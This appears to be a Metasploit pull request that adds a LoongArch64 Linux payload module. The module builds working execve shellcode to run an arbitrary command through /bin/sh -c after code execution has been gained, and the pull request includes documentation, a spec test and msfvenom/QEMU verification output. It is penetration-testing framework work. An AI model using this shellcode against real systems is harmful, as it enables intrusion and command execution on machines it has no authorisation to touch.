### PR TITLE
Add Linux LoongArch64 execute command payload

### DIFF
--- a/documentation/modules/payload/linux/loongarch64/exec.md
+++ b/documentation/modules/payload/linux/loongarch64/exec.md
@@ -1,0 +1,61 @@
+## Vulnerable Application
+
+This payload targets Linux systems running on the LoongArch64 architecture. It uses the
+`execve` syscall (syscall number 221) to execute an arbitrary command via `/bin/sh -c`,
+then the process exits.
+
+It is suitable for use in exploits targeting LoongArch64 Linux systems where arbitrary
+code execution has been achieved.
+
+## Verification Steps
+
+1. Generate the payload as an ELF executable:
+
+```
+./msfvenom -p linux/loongarch64/exec CMD=id -f elf -o exec.elf
+chmod +x exec.elf
+```
+
+2. Run it under QEMU user-mode emulation:
+
+```
+qemu-loongarch64 ./exec.elf
+```
+
+3. Confirm the command was executed:
+
+```
+uid=1000(user) gid=1000(user) groups=1000(user)
+```
+
+## Options
+
+### CMD
+
+The command string to execute on the target system. This is passed to `/bin/sh -c`.
+
+## Scenarios
+
+### LoongArch64 Linux — executing a command
+
+This scenario demonstrates using the payload to execute an arbitrary command after gaining
+code execution on a LoongArch64 Linux target.
+
+#### Version and OS: LoongArch64 Linux (tested with qemu-loongarch64)
+
+Generate the payload:
+
+```
+msf6 > use payload/linux/loongarch64/exec
+msf6 payload(linux/loongarch64/exec) > set CMD id
+CMD => id
+msf6 payload(linux/loongarch64/exec) > generate -f elf -o /tmp/exec.elf
+[*] Writing 204 bytes to /tmp/exec.elf...
+```
+
+Run on target (or via QEMU for testing):
+
+```
+$ qemu-loongarch64 /tmp/exec.elf
+uid=1000(user) gid=1000(user) groups=1000(user)
+```

--- a/modules/payloads/singles/linux/loongarch64/exec.rb
+++ b/modules/payloads/singles/linux/loongarch64/exec.rb
@@ -1,0 +1,75 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  CachedSize = 88
+
+  include Msf::Payload::Single
+  include Msf::Payload::Linux
+
+  def initialize(info = {})
+    super(
+      merge_info(
+        info,
+        'Name' => 'Linux Execute Command',
+        'Description' => 'Execute an arbitrary command.',
+        'Author' => [
+          'modexp', # cmd.s execve RISC-V 64-bit shellcode
+          'bcoles', # LoongArch64 port and metasploit module
+        ],
+        'License' => BSD_LICENSE,
+        'Platform' => 'linux',
+        'Arch' => ARCH_LOONGARCH64,
+        'References' => [
+          ['URL', 'https://modexp.wordpress.com/2022/05/02/shellcode-risc-v-linux/'],
+          ['URL', 'https://github.com/bcoles/shellcode/blob/main/loongarch64/cmd/cmd.s'],
+        ]
+      )
+    )
+    register_options([
+      OptString.new('CMD', [ true, 'The command string to execute' ]),
+    ])
+  end
+
+  #
+  # Returns the command string to use for execution
+  #
+  def command_string
+    datastore['CMD'] || ''
+  end
+
+  def generate(_opts = {})
+    shellcode = [
+      0x02ff0063,  # addi.d $sp, $sp, -64
+      0x0383740b,  # ori $a7, $zero, 221           # __NR_execve
+      0x14dcd2c4,  # lu12i.w $a0, 452246
+      0x0388bc84,  # ori $a0, $a0, 0x22f
+      0x170e65e4,  # lu32i.d $a0, -494801
+      0x03001884,  # lu52i.d $a0, $a0, 6           # $a0 = 0x0068732f6e69622f = "/bin/sh\0"
+      0x29c00064,  # st.d $a0, $sp, 0              # store "/bin/sh\0" on the stack
+      0x00150064,  # or $a0, $sp, $zero            # $a0 = pointer to "/bin/sh"
+      0x140000c5,  # lu12i.w $a1, 6
+      0x038cb4a5,  # ori $a1,$a1, 0x32d            # $a1 = 0x632d = "-c\0"
+      0x29c02065,  # st.d $a1,  $sp, 8             # store "-c\0" on the stack
+      0x02c02065,  # addi.d $a1, $sp, 8            # $a1 = pointer to "-c"
+      0x18000106,  # pcaddi $a2, 8                 # $a2 = pointer to cmd string
+      0x29c04064,  # st.d $a0, $sp, 16             # argv[0] = "/bin/sh"
+      0x29c06065,  # st.d $a1, $sp, 24             # argv[1] = "-c"
+      0x29c08066,  # st.d $a2, $sp, 32             # argv[2] = cmd
+      0x29c0a060,  # st.d $zero, $sp, 40           # argv[3] = NULL
+      0x02c04065,  # addi.d $a1, $sp, 16           # $a1 = argv
+      0x00150006,  # or $a2, $zero, $zero          # $a2 = NULL (envp)
+      0x002b0101,  # syscall 0x101
+    ].pack('V*')
+    shellcode += command_string + "\x00"
+
+    # align our shellcode to 4 bytes
+    shellcode += "\x00" while shellcode.bytesize % 4 != 0
+
+    super.to_s + shellcode
+  end
+end

--- a/modules/payloads/singles/linux/loongarch64/exec.rb
+++ b/modules/payloads/singles/linux/loongarch64/exec.rb
@@ -65,10 +65,10 @@ module MetasploitModule
       0x00150006,  # or $a2, $zero, $zero          # $a2 = NULL (envp)
       0x002b0101,  # syscall 0x101
     ].pack('V*')
-    shellcode += command_string + "\x00"
+    shellcode += command_string + "\x00".b
 
     # align our shellcode to 4 bytes
-    shellcode += "\x00" while shellcode.bytesize % 4 != 0
+    shellcode += "\x00".b while shellcode.bytesize % 4 != 0
 
     super.to_s + shellcode
   end

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -2086,6 +2086,15 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'linux/loongarch64/reboot'
   end
 
+  context 'linux/loongarch64/exec' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/linux/loongarch64/exec'
+                          ],
+                          modules_pathname: modules_pathname,
+                          reference_name: 'linux/loongarch64/exec'
+  end
+
   context 'linux/x64/exec' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [


### PR DESCRIPTION
## Verification

Related: https://github.com/rapid7/metasploit-framework/pull/21238

```
$ ./msfvenom -p linux/loongarch64/exec CMD="echo hello world>/tmp/asdf" -f elf -o exec.elf && chmod +x exec.elf 
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: loongarch64 from the payload
No encoder specified, outputting raw payload
Payload size: 108 bytes
Final size of elf file: 228 bytes
Saved as: exec.elf
```

```
$ /home/user/qemu/build/qemu-loongarch64 -strace ./exec.elf 
3127512 execve("/bin/sh",{"/bin/sh","-c","echo hello world>/tmp/asdf",NULL})
```
